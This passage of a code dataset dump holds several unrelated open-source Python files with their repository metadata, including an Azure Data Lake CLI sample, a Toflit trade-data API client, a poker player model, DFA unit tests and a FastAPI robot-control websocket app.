write_stdout(self._fs.head(f, size=args.bytes))\n\n def help_head(self):\n print(\"head [-c bytes | --bytes bytes] file ...\\n\")\n print(\"Display first bytes of a file\")\n\n def do_info(self, line):\n parser = argparse.ArgumentParser(prog=\"info\", add_help=False)\n parser.add_argument('files', type=str, nargs='+')\n args = parser.parse_args(line.split())\n\n for f in args.files:\n self._display_dict(self._fs.info(f, invalidate_cache=False))\n\n def help_info(self):\n print(\"info file ...\\n\")\n print(\"Display file information\")\n\n def _display_item(self, item, human_readable):\n mode = int(item['permission'], 8)\n\n if item['type'] == 'DIRECTORY':\n permissions = \"d\"\n elif item['type'] == 'SYMLINK':\n permissions = \"l\"\n else:\n permissions = \"-\"\n\n permissions += \"r\" if bool(mode & stat.S_IRUSR) else \"-\"\n permissions += \"w\" if bool(mode & stat.S_IWUSR) else \"-\"\n permissions += \"x\" if bool(mode & stat.S_IXUSR) else \"-\"\n permissions += \"r\" if bool(mode & stat.S_IRGRP) else \"-\"\n permissions += \"w\" if bool(mode & stat.S_IWGRP) else \"-\"\n permissions += \"x\" if bool(mode & stat.S_IXGRP) else \"-\"\n permissions += \"r\" if 
bool(mode & stat.S_IROTH) else \"-\"\n permissions += \"w\" if bool(mode & stat.S_IWOTH) else \"-\"\n permissions += \"x\" if bool(mode & stat.S_IXOTH) else \"-\"\n\n timestamp = item['modificationTime'] // 1000\n modified_at = datetime.fromtimestamp(timestamp).strftime('%b %d %H:%M')\n\n if human_readable:\n size = \"{:5s}\".format(self._format_size(item['length']))\n else:\n size = \"{:9d}\".format(item['length'])\n\n print(\"{} {} {} {} {} {}\".format(\n permissions,\n item['owner'][:8],\n item['group'][:8],\n size,\n modified_at,\n os.path.basename(item['name'])))\n\n def do_ls(self, line):\n parser = argparse.ArgumentParser(prog=\"ls\", add_help=False)\n parser.add_argument('dirs', type=str, nargs='*', default=[''])\n parser.add_argument('-h', '--human-readable', action='store_true')\n parser.add_argument('-l', '--detail', action='store_true')\n args = parser.parse_args(line.split())\n\n for d in args.dirs:\n for item in self._fs.ls(d, detail=args.detail, invalidate_cache=False):\n if args.detail:\n self._display_item(item, args.human_readable)\n else:\n print(os.path.basename(item))\n\n def help_ls(self):\n print(\"ls [-h | --human-readable] [-l | --detail] [file ...]\\n\")\n print(\"List directory contents\")\n\n def do_mkdir(self, line):\n parser = argparse.ArgumentParser(prog=\"mkdir\", add_help=False)\n parser.add_argument('dirs', type=str, nargs='+')\n args = parser.parse_args(line.split())\n\n for d in args.dirs:\n self._fs.mkdir(d)\n\n def help_mkdir(self):\n print(\"mkdir directory ...\\n\")\n print(\"Create directories\")\n\n def do_mv(self, line):\n parser = argparse.ArgumentParser(prog=\"mv\", add_help=False)\n parser.add_argument('files', type=str, nargs='+')\n args = parser.parse_args(line.split())\n\n self._fs.mv(args.files[0], args.files[1])\n\n def help_mv(self):\n print(\"mv from-path to-path\\n\")\n print(\"Rename from-path to to-path\")\n\n def do_put(self, line):\n parser = argparse.ArgumentParser(prog=\"put\", add_help=False)\n parser.add_argument('local_path', type=str)\n parser.add_argument('remote_path', type=str, nargs='?', default='.')\n parser.add_argument('-b', '--chunksize', type=int, default=2**28)\n parser.add_argument('-c', '--threads', type=int, default=None)\n parser.add_argument('-f', '--force', action='store_true')\n args = parser.parse_args(line.split())\n\n ADLUploader(self._fs, args.remote_path, args.local_path,\n nthreads=args.threads, chunksize=args.chunksize,\n overwrite=args.force)\n\n def help_put(self):\n print(\"put [option]... 
local-path [remote-path]\")\n        print(\"Store a local file on the remote machine\\n\")\n        print(\"Options:\")\n        print(\"    -b \")\n        print(\"    --chunksize \")\n        print(\"        Set size of chunk to store atomically, in bytes.\\n\")\n        print(\"    -c \")\n        print(\"    --threads \")\n        print(\"        Set number of multiple requests to perform at a time.\")\n        print(\"    -f\")\n        print(\"    --force\")\n        print(\"        Overwrite an existing file or directory.\")\n\n    def do_quit(self, line):\n        return True\n\n    def help_quit(self):\n        print(\"quit\\n\")\n        print(\"Exit the application\")\n\n    def do_rm(self, line):\n        parser = argparse.ArgumentParser(prog=\"rm\", add_help=False)\n        parser.add_argument('files', type=str, nargs='+')\n        parser.add_argument('-r', '--recursive', action='store_true')\n        args = parser.parse_args(line.split())\n\n        for f in args.files:\n            self._fs.rm(f, recursive=args.recursive)\n\n    def help_rm(self):\n        print(\"rm [-r | --recursive] file ...\\n\")\n        print(\"Remove directory entries\")\n\n    def do_rmdir(self, line):\n        parser = argparse.ArgumentParser(prog=\"rmdir\", add_help=False)\n        parser.add_argument('dirs', type=str, nargs='+')\n        args = parser.parse_args(line.split())\n\n        for d in args.dirs:\n            self._fs.rmdir(d)\n\n    def help_rmdir(self):\n        print(\"rmdir directory ...\\n\")\n        print(\"Remove directories\")\n\n    def do_tail(self, line):\n        parser = argparse.ArgumentParser(prog=\"tail\", add_help=False)\n        parser.add_argument('files', type=str, nargs='+')\n        parser.add_argument('-c', '--bytes', type=int, default=1024)\n        args = parser.parse_args(line.split())\n\n        for f in args.files:\n            write_stdout(self._fs.tail(f, size=args.bytes))\n\n    def help_tail(self):\n        print(\"tail [-c bytes | --bytes bytes] file ...\\n\")\n        print(\"Display last bytes of a file\")\n\n    def do_touch(self, line):\n        parser = argparse.ArgumentParser(prog=\"touch\", add_help=False)\n        parser.add_argument('files', type=str, nargs='+')\n        args = parser.parse_args(line.split())\n\n        for f in args.files:\n            self._fs.touch(f)\n\n    def help_touch(self):\n        print(\"touch file ...\\n\")\n        print(\"Change file access and modification times\")\n\n    def do_EOF(self, line):\n        return True\n\n    def do_list_uploads(self, line):\n        print(ADLUploader.load())\n\n    def help_list_uploads(self):\n        print(\"Shows interrupted but persisted uploads\")\n\n    def do_clear_uploads(self, line):\n        ADLUploader.clear_saved()\n\n    def help_clear_uploads(self):\n        print(\"Forget all persisted uploads\")\n\n    def do_resume_upload(self, line):\n        try:\n            up = ADLUploader.load()[line]\n            up.run()\n        except KeyError:\n            print(\"No such upload\")\n\n    def help_resume_upload(self):\n        print(\"resume_upload name\")\n        print()\n        print(\"Restart the upload designated by name and run until done.\")\n\n    def do_list_downloads(self, line):\n        print(ADLDownloader.load())\n\n    def help_list_downloads(self):\n        print(\"Shows interrupted but persisted downloads\")\n\n    def do_clear_downloads(self, line):\n        ADLDownloader.clear_saved()\n\n    def help_clear_downloads(self):\n        print(\"Forget all persisted downloads\")\n\n    def do_resume_download(self, line):\n        try:\n            up = ADLDownloader.load()[line]\n            up.run()\n        except KeyError:\n            print(\"No such download\")\n\n    def help_resume_download(self):\n        print(\"resume_download name\")\n        print()\n        print(\"Restart the download designated by name and run until done.\")\n\n\ndef setup_logging(default_level='WARNING'):\n    \"\"\" Setup logging configuration\n\n    The logging configuration can be overridden with one environment variable:\n\n    ADLFS_LOG_LEVEL (defines logging level)\n    \"\"\"\n    import logging\n    import
os\n    import sys\n\n    log_level = os.environ.get('ADLFS_LOG_LEVEL', default_level)\n\n    levels = dict(\n        CRITICAL=logging.CRITICAL,\n        ERROR=logging.ERROR,\n        WARNING=logging.WARNING,\n        INFO=logging.INFO,\n        DEBUG=logging.DEBUG)\n\n    if log_level in levels:\n        log_level = levels[log_level]\n    else:\n        sys.exit(\"invalid ADLFS_LOG_LEVEL '{0}'\".format(log_level))\n\n    logging.basicConfig(level=log_level)\n\n\nif __name__ == '__main__':\n    setup_logging()\n    fs = AzureDLFileSystem()\n    if len(sys.argv) > 1:\n        AzureDataLakeFSCommand(fs).onecmd(' '.join(sys.argv[1:]))\n    else:\n        AzureDataLakeFSCommand(fs).cmdloop()\n","repo_name":"Azure/azure-data-lake-store-python","sub_path":"samples/cli.py","file_name":"cli.py","file_ext":"py","file_size_in_byte":15937,"program_lang":"python","lang":"en","doc_type":"code","stars":64,"dataset":"github-code","pt":"47"}
+{"seq_id":"12033560132","text":"from lib.base import Client\n\nclass Toflit(Client): \n    \"\"\"\n    Utility client for querying the Toflit data\n    \"\"\"\n    BASE_URL = 'http://toflit18.medialab.sciences-po.fr/api'\n    \n    def _format_response(self, response):\n        \"\"\"\n        Formats the Toflit API responses so that the result payload is returned directly\n        \"\"\"\n        if response is not None:\n            return response['result']\n        else :\n            return None\n    \n    def get_directions(self, params=None):\n        \"\"\"\n        Synopsis: fetches the trade directions in the database\n        ---\n        Parameters: none\n        \"\"\"\n        response = self.api('/directions', params=params)\n        return self._format_response(response)\n    \n    def get_sources_types(self, params=None):\n        \"\"\"\n        Synopsis: fetches the available source types\n        ---\n        Parameters: none\n        \"\"\"\n        response = self.api('/source_types', params=params)\n        return self._format_response(response)\n    \n    def get_product_classifications(self, params=None):\n        \"\"\"\n        Synopsis: fetches the product classifications\n        ---\n        Parameters: none\n        \"\"\"\n        response = self.api('/classification', params=params)\n        response = self._format_response(response)\n        return response['product']\n\n    def get_partner_classifications(self, params=None):\n        \"\"\"\n        Synopsis: fetches the partner classifications\n        ---\n        Parameters: none\n        \"\"\"\n        response = self.api('/classification', params=params)\n        response = self._format_response(response)\n        return response['partner']\n    \n    def get_classification_groups(self, classification, params=None):\n        \"\"\"\n        Synopsis: fetches all the categories associated with a given classification (without the detail of the values)\n        Parameter classification: the name of the classification prefixed by its type (e.g. \"product_simplification\" or \"partner_source\")\n        ---\n        Parameters: none?\n        \"\"\"\n        response = self.api('/classification/' + classification + '/groups/', params=params)\n        response = self._format_response(response)\n        return response\n\n    def get_classification_sliced_search(self, classification, params=None):\n        \"\"\"\n        Synopsis: fetches the detail of the groupings associated with a given classification, limited to one slice of results\n        Parameter classification: the name of the classification prefixed by its type (e.g. \"product_simplification\" or \"partner_source\")\n        ---\n        Parameters: none?\n        \"\"\"\n        response = self.api('/classification/' + classification + '/search/', params=params)\n        response = self._format_response(response)\n        print (\"Number of classifications found in this slice: \", len(response))\n        return response\n\n    # long-term goal: a single function (requires handling the default query argument correctly)\n    def get_classification_search(self, classification, params=None, query={\"limit\":\"5000\"}): \n        \"\"\"\n        Synopsis: fetches the detail of the groupings associated with a given classification.\n        Parameter classification: the name of the classification prefixed by its type (e.g. \"product_simplification\" or \"partner_source\")\n        The query parameter can be overridden; by default results are fetched in slices of 5000 classifications \n        ---\n        Parameters: none?\n        \"\"\"\n\n        # initialisations\n        results = []\n        current_query = query.copy()\n        current_index = query.get('offset', 0) # default value\n        current_query['offset']=current_index\n        limit = query['limit']\n        error = None\n        length = 1 # length of a slice (initialised to 1 for the first pass through the while loop)\n\n        # as long as responses keep coming (and no errors occur), fetch the results slice by slice\n        while length: \n            response = self.api('/classification/' + classification + '/search/', query=current_query) \n            temp_results = self._format_response(response)\n            length = len(temp_results)\n            # print(\"length of current result :\", length)\n            results += temp_results \n            current_query['offset'] += int(limit)\n\n        print (\"Number of classifications found: \", len(results))\n        return results \n    \n    \n    def get_locations(self, classification, params=None):\n        \"\"\"\n        Synopsis: fetches the network of locations (directions and partners) and the amount of their trade\n        ---\n        Parameter classification: the id of the partner classification to use\n        ---\n        Parameters:\n        * dateMax :  # end year\n        * dateMin :  # start year\n        * kind : total | import | export # which flows to use\n        * sourceType :  # id of the source type to use\n        * product :  # list of products to filter\n        * productClassification :  # product classification to use for the filter\n        \"\"\"\n        response = self.api('/viz/network/' + classification, method='post', params=None, data=params)\n        return self._format_response(response)\n    \n    def get_time_series(self, params=None):\n        \"\"\"\n        Synopsis: fetches time series about the flows of goods\n        ---\n        Parameters:\n        * direction : \"$all$\" | [direction name] # name of the direction to filter\n        * sourceType :  # id of the source type to use\n        * color:  # not relevant / visualization-related\n        * dateMax :  # end year\n        * dateMin :  # start year\n        * partnerClassification :  # the name of the partner classification to fetch\n        * partner :  # the trade partners to take into account (e.g. {name: 'Alsace', id: 'Alsace~partner_orthographic'})\n        * kind : *total* | import | export # which flows to use\n        * product :  # list of products to filter\n        * productClassification :  # product classification to use for the filter\n        \"\"\"\n        response = self.api('/viz/line/', method='post', params=None, data=params)\n        return self._format_response(response)\n    \n    def get_flows_per_year(self, type, params=None):\n        \"\"\"\n        Synopsis: fetches the flows per year, by direction or by source type\n        ---\n        Parameter type: the flow type, 'direction' or 'sourceType'\n        ---\n        Parameters:\n        * direction : \"$all$\" | [direction name] # name of the direction to filter\n        * sourceType :  # id of the source type to use\n        * color:  # not relevant / visualization-related\n        * dateMax : \n        * dateMin : \n        * partnerClassification :  # the name of the partner classification to fetch\n        * partner :  # the trade partners to take into account (e.g. {name: 'Alsace', id: 'Alsace~partner_orthographic'})\n        * kind : *total* | import | export # which flows to use\n        * product :  # list of products to filter\n        * productClassification :  # product classification to use for the filter\n        \"\"\"\n        response = self.api('/viz/flows_per_year/' + type, method='post', params=None, data=params)\n        return self._format_response(response)\n    \n    def get_product_terms(self, classification, params=None):\n        \"\"\"\n        Synopsis: fetches time series about the flows of goods\n        ---\n        Parameter classification: the id of the product classification to use\n        ---\n        Parameters:\n        * direction : \"$all$\" | [direction name] # name of the direction to filter\n        * sourceType :  # id of the source type to use\n        * color:  # not relevant / visualization-related\n        * dateMax : \n        * dateMin : \n        * childClassification :  # the name of the product classification to fetch\n        * child :  # the products to filter (e.g. {name: 'Alsace', id: 'Alsace~partner_orthographic'})\n        * partnerClassification :  # the name of the partner classification to fetch\n        * partner :  # the trade partners to take into account (e.g. {\"id\": \"Raw_materials,_inedible,_except_fuels~product_sitc_EN\", \"name\": \"Raw materials, inedible, except fuels\", \"value\": \"Raw_materials,_inedible,_except_fuels~product_sitc_EN\"})\n        * kind : *total* | import | export # which flows to use\n        * product :  # list of products to filter\n        * productClassification :  # product classification to use for the filter\n        \"\"\"\n        response = self.api('/viz/terms/' + classification, method='post', params=None, data=params)\n        return self._format_response(response)\n    \n    def get_flows(self, params=None):\n        \"\"\"\n        Synopsis: fetches the flows at the finest level of granularity, according to a series of parameters\n        ---\n        Parameters:\n        * limit :  # number of entries to return\n        * skip :  # at which point of the list to start returning items\n        * columns :  # list of the columns to return about the flows\n        * kind : *total* | import | export # which flows to use\n        * direction : \"$all$\" | [direction name] # name of the direction to filter\n        * sourceType :  # id of the source type to use\n        * color:  # not relevant / visualization-related\n        * dateMax : \n        * dateMin : \n        * partnerClassification :  # the name of the partner classification to fetch\n        * partner :  # the trade partners to take into account (e.g. {name: 'Alsace', id: 'Alsace~partner_orthographic'})\n        * product :  # list of products to filter\n        * productClassification :  # product classification to use for the filter\n        \"\"\"\n\n        # initialisations\n        results = []\n        current_params = params.copy()\n        current_index = params['skip']\n        limit = params['limit']\n        error = None\n        length = 1 # length of a slice (initialised to 1 for the first pass through the while loop)\n\n        # as long as responses keep coming (and no errors occur), fetch the result slices\n        while length: \n            # print(\"current index:\", current_index)\n            response = self.api('/flows/', method='post', params=None, data={**current_params, \"skip\":current_index}) # returns a json object with a result attribute \n            temp_results = self._format_response(response)\n            length = len(temp_results)\n            # print(\"length of current result :\", length)\n            if length < limit: # length < limit => last slice reached, exit the while loop\n                length=0\n            \n            results += temp_results # global store of results\n            current_index += limit\n            # print(\"incremented index:\", current_index)\n\n        print (\"Number of flows found: \", len(results))\n        return results \n    ","repo_name":"medialab/portic-explorations","sub_path":"lib/toflit.py","file_name":"toflit.py","file_ext":"py","file_size_in_byte":11684,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"}
+{"seq_id":"7946559681","text":"import numpy as np\nimport tensorflow as tf\nfrom time import time\nimport math\n\n\nfrom include.data import get_data_set\nfrom include.model import model, lr\n\n\n\nx, y, keep_prob, output, y_pred_cls, global_step, learning_rate = model()\ntest_x, test_y = get_data_set(\"test\")\nglobal_accuracy = 0\nepoch_start = 0\n_BATCH_SIZE = 128\n_EPOCH = 20\n_SAVE_PATH = \"./tensorboard/cifar-10-v1.0.0/\"\n\n\nsaver = tf.train.Saver()\nsess = tf.Session()\n\n\ntry:\n    print(\"\\nTrying to restore last checkpoint ...\")\n    last_chk_path = tf.train.latest_checkpoint(checkpoint_dir=_SAVE_PATH)\n    saver.restore(sess, save_path=last_chk_path)\n    print(\"Restored checkpoint from:\", last_chk_path)\nexcept Exception:\n    print(\"\\nFailed to restore checkpoint. Initializing variables instead.\")\n    sess.run(tf.global_variables_initializer())  # fall back to freshly initialized variables\n\n# buffers for the raw network outputs and the predicted class of each test image\npredicted_out = np.zeros(shape=test_y.shape, dtype=np.float32)\npredicted_class = np.zeros(shape=len(test_x), dtype=int)\ni = 0\nwhile i < len(test_x):\n    j = min(i + _BATCH_SIZE, len(test_x))\n    batch_xs = test_x[i:j, :]\n    batch_ys = test_y[i:j, :]\n    predicted_class[i:j], predicted_out[i:j] = sess.run(\n        [y_pred_cls, output],\n        feed_dict={x: batch_xs, y: batch_ys, learning_rate: lr(1), keep_prob: 1.0}\n    )\n    i = j\n\nvector_embeddings = tf.get_variable('predicted_out', test_y.shape)\nwith open(\"metadata.tsv\", 'w') as file_metadata:\n    for label in predicted_class:\n        file_metadata.write(str(label)+'\\n')","repo_name":"zlf1993/Graduate-Seminar","sub_path":"tensorflow-cifar-10-master/test_jupyter.py","file_name":"test_jupyter.py","file_ext":"py","file_size_in_byte":1423,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"}
+{"seq_id":"41848280127","text":"from core.networks.double_nodes.AbstractDifferentiableDoubleNode import AbstractDifferentiableDoubleNode\n\n\nclass AbstractNaturalDifferentiableDoubleNode(AbstractDifferentiableDoubleNode):\n\n    def __init__(self, b_size, n_z_samples, b_size_int, n_z_samples_int, clip_probs=0, pm=True, initializers={},\n                 regularizers={},\n                 automatic_diff=False):\n        super().__init__(b_size=b_size, n_z_samples=n_z_samples, b_size_int=b_size_int, n_z_samples_int=n_z_samples_int,\n                         clip_probs=clip_probs, pm=pm,\n                         initializers=initializers, regularizers=regularizers, automatic_diff=automatic_diff)\n\n    def wake(self, use_natural=False, weights=None, global_step=None, layer_name=\"\", imp_weights=None,\n             fisher_calculator=None):\n        if self._automatic_diff:\n            self._gradients_w = self.auto_diff(loss=self.loss_w, variables=self.variables_w,\n                                               stops=[self.sample_w_q, self.inputs_r],\n                                               weights=weights)\n        else:\n            self._gradients_w = self.manual_diff(self.inputs_r, self.probs_w_p, self.sample_w_q,\n                                                 weights=weights)\n\n        if use_natural:\n            self._natural_gradients_w = self.gen_distr._apply_fisher_multipliers(\n                fisher_calculator=fisher_calculator,\n                next_layer_distr_probs=self.probs_s_p,\n                previous_layer_sample=self.inputs_p,\n                grads=self._gradients_w,\n                global_step=global_step,\n                layer=layer_name,\n                imp_weights=imp_weights)  # only one that needs this\n            return self._natural_gradients_w, self.variables_w\n        else:\n            return self._gradients_w, self.variables_w\n\n    def wake_phase_sleep(self, use_natural=False, weights=None, global_step=None, layer_name=\"\",\n                         fisher_calculator=None):\n\n        if self._automatic_diff:\n            self._gradients_ws = self.auto_diff(loss=self.loss_w_s, variables=self.variables_s,\n                                                stops=[self.inputs_r],\n                                                weights=weights)  # Loss?\n        else:\n            self._gradients_ws = self.manual_diff(self.sample_w_q, self.probs_w_q, self.inputs_r,\n                                                  weights=weights)\n\n        if use_natural:\n            self._natural_gradients_ws = self.rec_distr._apply_fisher_multipliers(\n                fisher_calculator=fisher_calculator,\n                next_layer_distr_probs=self.probs_w_q,\n                previous_layer_sample=self.inputs_r,\n                grads=self._gradients_ws,\n                global_step=global_step,\n                layer=layer_name,\n                imp_weights=None)\n            return self._natural_gradients_ws, self.variables_s\n        else:\n            return self._gradients_ws, self.variables_s\n\n    def sleep(self, use_natural=False, weights=None, global_step=None, layer_name=\"\", fisher_calculator=None):\n        if self._automatic_diff:\n            self._gradients_s = self.auto_diff(loss=self.loss_s, variables=self.variables_s,\n                                               stops=[self.sample_s_p, self.inputs_p],\n                                               weights=weights)\n        else:\n
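            # Manual differentiation path: mirrors wake() above, but builds the
            # sleep-phase gradients from the generative inputs, the recognition
            # probabilities, and the dreamed sample (inputs_p, probs_s_q, sample_s_p)
            # instead of differentiating the loss with autodiff.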
self._gradients_s = self.manual_diff(self.inputs_p, self.probs_s_q, self.sample_s_p,\n weights=weights)\n if use_natural:\n self._natural_gradients_s= self.rec_distr._apply_fisher_multipliers(\n fisher_calculator=fisher_calculator,\n next_layer_distr_probs=self.probs_w_q,\n previous_layer_sample=self.inputs_r,\n grads=self._gradients_s,\n global_step=global_step,\n layer=layer_name,\n imp_weights=None)\n return self._natural_gradients_s, self.variables_s\n else:\n return self._gradients_s, self.variables_s\n","repo_name":"szokejokepu/natural-rws","sub_path":"core/networks/double_nodes/AbstractNaturalDifferentiableDoubleNode.py","file_name":"AbstractNaturalDifferentiableDoubleNode.py","file_ext":"py","file_size_in_byte":4233,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"14832569697","text":"def num_vow(word):\r\n vowels = set(\"aeiouAEIOU\")\r\n count = 0 \r\n for char in word:\r\n if char in vowels:\r\n count += 1\r\n return count\r\n\r\nword = \"you are a star\"\r\nprint(num_vow(word))","repo_name":"das28/python_programs","sub_path":"python programms/strings/num_vowels_using_set.py","file_name":"num_vowels_using_set.py","file_ext":"py","file_size_in_byte":208,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"12770176366","text":"from datetime import datetime\n\nfrom pokerserver.database import PlayersRelation, PlayerState\n\nPLAYER_NAME_PATTERN = \"[A-Za-z0-9]{3,}\"\n\n\nclass PlayerNotFoundError(Exception):\n pass\n\n\nclass Player:\n # pylint: disable=too-many-instance-attributes\n def __init__(self, table_id, position, name, balance, cards, bet, # pylint: disable=too-many-arguments\n last_seen=None, state=PlayerState.PLAYING):\n self.table_id = table_id\n self.position = position\n self.name = name\n self.balance = balance\n self.cards = cards\n self.bet = bet\n self.last_seen = last_seen if last_seen is not None else datetime.now()\n self.state = state\n\n def __eq__(self, other):\n if not isinstance(other, Player):\n return False\n return self.__dict__ == other.__dict__\n\n def __hash__(self):\n return hash(self.name)\n\n def to_dict(self, show_cards=False):\n return {\n 'table_id': self.table_id,\n 'position': self.position,\n 'name': self.name,\n 'balance': self.balance,\n 'cards': self.cards if show_cards else [],\n 'bet': self.bet,\n 'state': self.state.value\n }\n\n @classmethod\n async def load_by_name(cls, name):\n player = await PlayersRelation.load_by_name(name)\n if player is not None:\n return Player(**player)\n else:\n raise PlayerNotFoundError()\n\n @classmethod\n async def load_if_exists(cls, name):\n return await PlayersRelation.load_by_name(name)\n\n @classmethod\n async def sit_down(cls, table, position, name, balance): # pylint: disable=too-many-arguments\n await PlayersRelation.add_player(\n table.table_id,\n position,\n name,\n balance,\n cards=[],\n bet=0,\n last_seen=datetime.now(),\n state=PlayerState.SITTING_OUT\n )\n\n @classmethod\n async def load_by_table_id(cls, table_id):\n players = await PlayersRelation.load_by_table_id(table_id)\n return [cls(**player) for player in players]\n\n @classmethod\n def is_valid_name(cls, name):\n return name.isalpha()\n\n async def set_bet(self, bet):\n self.bet = bet\n await PlayersRelation.set_bet(self.name, self.table_id, self.bet)\n\n async def reset(self):\n await self.set_bet(0)\n await self.set_state(PlayerState.PLAYING)\n\n async def increase_bet(self, amount):\n assert amount > 0, 'Need to 
increase bet by more than 0.'\n        await PlayersRelation.set_balance_and_bet(self.name, self.table_id, self.balance - amount, self.bet + amount)\n        self.balance -= amount\n        self.bet += amount\n        if self.balance == 0:\n            await self.all_in()\n\n    async def increase_balance(self, increase):\n        assert increase >= 0, 'the balance increase must not be negative'\n        self.balance += increase\n        await PlayersRelation.set_balance(self.name, self.table_id, self.balance)\n\n    async def set_cards(self, cards):\n        assert len(cards) <= 2\n        await PlayersRelation.set_cards(self.name, self.table_id, cards)\n        self.cards = cards\n\n    async def fold(self):\n        await self.set_state(PlayerState.FOLDED)\n\n    async def all_in(self):\n        await self.set_state(PlayerState.ALL_IN)\n\n    def is_all_in(self):\n        return self.state == PlayerState.ALL_IN\n\n    async def sit_out(self):\n        await self.set_state(PlayerState.SITTING_OUT)\n\n    async def set_state(self, state):\n        self.state = state\n        await PlayersRelation.set_state(self.name, self.table_id, self.state)\n\n    def __repr__(self):\n        return '<Player: {}>'.format(self.name)\n\n    def __str__(self):\n        return self.name\n","repo_name":"MartinAltmayer/pokerserver","sub_path":"pokerserver/models/player.py","file_name":"player.py","file_ext":"py","file_size_in_byte":3804,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"47"}
+{"seq_id":"10993038482","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Mar 24 15:00:04 2021\n\n@author: Aspire\n\"\"\"\n\nt = int(input())\n\nfor i in range(0,t):\n    n = int(input())\n    a = list(map(int,input().split()))\n    c = 0\n    d = 0\n    for j in range(0,n):\n        if j%2 != a[j]%2:\n            if j%2==0:\n                c = c + 1\n            elif j%2!=0:\n                d = d + 1\n    \n    if c==d:\n        print(c)\n    else:\n        print('-1')","repo_name":"tanjina-3ni/CodeForces-Solutions","sub_path":"1367B.py","file_name":"1367B.py","file_ext":"py","file_size_in_byte":428,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"}
+{"seq_id":"21092328745","text":"from unittest import TestCase\n\nfrom src.dataStructures.dfa import DFA\n\n\nclass TestDFA(TestCase):\n    def setUp(self) -> None:\n        alphabet = {\"a\", \"b\"}\n        states = {\"\", \"a\", \"b\", \"aa\", \"bb\", \"ab\", \"ba\"}\n        transitions = {}\n        initial_state = \"\"\n        final_states = {\"bb\", \"aa\"}\n\n        self.dfa = DFA(states, alphabet, transitions, initial_state, final_states)\n        return super().setUp()\n\n    def test_add_transition_empty_transitions(self):\n        from_state = \"a\"\n        symbol = \"b\"\n        to_state = \"ab\"\n\n        self.dfa.add_transition(from_state, symbol, to_state)\n\n        self.assertEqual(self.dfa.transitions, {\"a\": {\"b\": \"ab\"}})\n\n    def test_add_transition_not_empty_transitions(self):\n        self.dfa.add_transition(\"a\", \"a\", \"aa\")\n        from_state = \"a\"\n        symbol = \"b\"\n        to_state = \"ab\"\n\n        self.dfa.add_transition(from_state, symbol, to_state)\n\n        self.assertEqual(self.dfa.transitions, {\"a\": {\"a\": \"aa\", \"b\": \"ab\"}})\n\n    def test_next_state_valid(self):\n        self.dfa.add_transition(\"a\", \"a\", \"aa\")\n        from_state = \"a\"\n        symbol = \"a\"\n        next_state = \"aa\"\n\n        result = self.dfa.next_state(symbol, from_state)\n\n        self.assertEqual(result, next_state)\n\n    def test_next_state_invalid(self):\n        self.dfa.add_transition(\"a\", \"a\", \"aa\")\n        from_state = \"a\"\n        symbol = \"b\"\n\n        invalid = False\n        try:\n            self.dfa.next_state(symbol, from_state)\n        except ValueError:\n            invalid = True\n\n        self.assertTrue(invalid)\n\n    def test_parse_string_valid(self):\n        self.dfa.add_transition(\"\", \"a\", \"a\")\n
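        # Chain a second transition so the machine can walk "" -a-> "a" -b-> "ab" below.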
self.dfa.add_transition(\"a\", \"b\", \"ab\")\n string = \"ab\"\n\n result = self.dfa.parse_string(string)\n\n self.assertEqual(result, [\"\", \"a\", \"ab\"])\n\n def test_parse_string_invalid(self):\n string = \"ab\"\n\n invalid = False\n try:\n self.dfa.parse_string(string)\n except ValueError:\n invalid = True\n\n self.assertTrue(invalid)\n\n def test_has_transition_valid(self):\n self.dfa.add_transition(\"\", \"a\", \"a\")\n state = \"\"\n symbol = \"a\"\n\n result = self.dfa.has_transition(state, symbol)\n\n self.assertTrue(result)\n\n def test_has_transition_invalid_state(self):\n self.dfa.add_transition(\"\", \"a\", \"a\")\n state = \"b\"\n symbol = \"a\"\n\n result = self.dfa.has_transition(state, symbol)\n\n self.assertFalse(result)\n\n def test_has_transition_invalid_symbol(self):\n self.dfa.add_transition(\"\", \"a\", \"a\")\n state = \"\"\n symbol = \"b\"\n\n result = self.dfa.has_transition(state, symbol)\n\n self.assertFalse(result)\n","repo_name":"agranadosb/TFG","sub_path":"src/dataStructures/tests/test_dfa.py","file_name":"test_dfa.py","file_ext":"py","file_size_in_byte":2723,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"10186232226","text":"from fastapi import FastAPI, Request, WebSocket\nfrom fastapi.templating import Jinja2Templates\nfrom src.robot_movement import direction_of_movement\nfrom src.robot_movement import move_direction\nfrom src.robot_movement import set_gpio_mode\n\napp = FastAPI()\ntemplates = Jinja2Templates(directory=\"templates/\")\n\nset_gpio_mode() \n\n@app.get('/')\ndef omniwheeler_app():\n return \"Omniwheeler App\"\n\n\n@app.get(\"/index\")\ndef remote_control_direction_post(request: Request):\n result = \"Click a direction\"\n return templates.TemplateResponse('index.html', context={'request': request, 'result': result})\n\n\n#@app.post(\"/index\")\n#def remote_control_direction_post(request: Request, direction: str = Form(...)):\n# result = direction_of_movement(direction)\n# return templates.TemplateResponse('index.html', context={'request': request, 'result': result})\n\n@app.websocket(\"/ws\")\nasync def websocket_endpoint(websocket: WebSocket):\n await websocket.accept()\n while True:\n data = await websocket.receive_text()\n # rotation is a temp variable to print data. 
